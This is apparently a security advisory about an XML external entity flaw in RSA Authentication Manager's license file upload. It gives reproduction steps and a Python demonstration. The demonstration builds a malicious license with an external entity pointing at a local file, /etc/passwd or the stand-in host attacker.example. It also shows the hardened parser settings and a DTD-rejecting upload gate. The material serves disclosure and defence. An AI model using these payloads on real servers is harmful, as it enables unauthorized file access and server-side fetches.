RSA Authentication Manager
cpe:2.3:a:rsa:authentication_manager:*:*:*:*:*:*:*
- 8.7 SP1 P01 HF01
An XML External Entity (XXE) vulnerability has been identified in RSA Authentication Manager versions prior to 8.7 SP2 Patch 1. The issue is in the license file processor, which parses uploaded license files with external entity resolution enabled: an attacker who can upload a license file can declare an external entity whose system identifier points at a location of their choosing. The classic XXE outcome, reading server-side files back out to the attacker, is not possible here, but the RSA Authentication Manager server itself will fetch the arbitrary file the entity names, potentially leading to unauthorized access to sensitive information or files.
Exploitation therefore amounts to an unauthorized file upload to the server; whether a file placed this way can later be accessed or executed depends on its content and on the server's configuration.
To reproduce this vulnerability, upload a license file whose DOCTYPE declares an external entity with a SYSTEM identifier pointing at a file on a server you control, and reference that entity in the document body. The RSA Authentication Manager server will issue an out-of-band HTTP request to that location; the request arriving at your server confirms that the external entity was resolved and the file fetched.
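The mechanism described above, as an added example that is not RSA's code and not the license-file processor itself. It uses Python's xml.sax, whose feature_external_ges switch stands in for the vulnerable setting; the license document layout, the <key> element, the temp-file path and the canary URL http://attacker.example/canary are all assumptions constructed for the demonstration. It shows three things: a resolving parser pulling a server-side file into the parsed document, a recording EntityResolver capturing the URL a resolving parser would request (the out-of-band indicator from the reproduction steps, captured instead of sent), and the hardened configuration plus a pre-parse gate that rejects any license carrying a DTD.

```python
import io
import os
import re
import tempfile
import xml.sax
from xml.sax import handler, xmlreader
from xml.sax.handler import ContentHandler, EntityResolver


def build_license_xml(system_id: str) -> bytes:
    """Constructed malicious license: the DOCTYPE declares an external general
    entity with an attacker-chosen SYSTEM id, referenced inside <key>."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE license [<!ENTITY fetched SYSTEM "{system_id}">]>\n'
        '<license><customer>ACME</customer><key>&fetched;</key></license>\n'
    ).encode()


class KeyCollector(ContentHandler):
    """Collects the character data of <key>, where &fetched; expands."""

    def __init__(self):
        super().__init__()
        self.parts, self.in_key = [], False

    def startElement(self, name, attrs):
        self.in_key = name == "key"

    def endElement(self, name):
        if name == "key":
            self.in_key = False

    def characters(self, content):
        if self.in_key:
            self.parts.append(content)


class RecordingResolver(EntityResolver):
    """Records every system id the parser tries to fetch and hands back an
    empty stream, so the attempted retrieval is visible without any I/O."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = xmlreader.InputSource(systemId)
        src.setByteStream(io.BytesIO(b""))
        return src


def parse_license_key(xml_bytes: bytes, resolve_external: bool, resolver=None) -> str:
    """Parse a license and return the text of <key>.
    resolve_external=True is the vulnerable configuration: the parser opens
    whatever the entity's system id names (assumed to mirror the flaw)."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    if resolver is not None:
        parser.setEntityResolver(resolver)
    collector = KeyCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def demo_local_file_read():
    """Vulnerable parser: a file on the server's own disk (a temp file created
    here as the sample) is read and its bytes land inside the parsed document."""
    marker = "SERVER-SIDE-FILE-CONTENT"
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(marker)
    try:
        key = parse_license_key(build_license_xml(path), resolve_external=True)
    finally:
        os.unlink(path)
    return marker, key


def demo_fetch_target(url: str = "http://attacker.example/canary"):
    """Which location a resolving parser would request: the out-of-band
    request from the reproduction steps, captured by the resolver."""
    resolver = RecordingResolver()
    parse_license_key(build_license_xml(url), resolve_external=True, resolver=resolver)
    return resolver.requested


def demo_hardened(path: str = "/etc/passwd") -> str:
    """Hardened parser: external general entities are never resolved, so
    <key> stays empty whatever the system id points at."""
    return parse_license_key(build_license_xml(path), resolve_external=False)


_DTD = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def is_acceptable_license(xml_bytes: bytes) -> bool:
    """Upload gate to run before parsing: a license file has no business
    carrying a DOCTYPE or entity declaration at all."""
    return _DTD.search(xml_bytes) is None


if __name__ == "__main__":
    print("vulnerable parser read:", demo_local_file_read()[1])
    print("would request:", demo_fetch_target())
    print("hardened parser read:", repr(demo_hardened()))
```

The two defences are independent: disabling external entity resolution is what stops the fetch, and the DTD gate rejects the malicious file before any parser sees it, which is the cheaper check to bolt onto an upload handler.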
Update to RSA Authentication Manager 8.7 SP2 Patch 1 or later to remediate this vulnerability.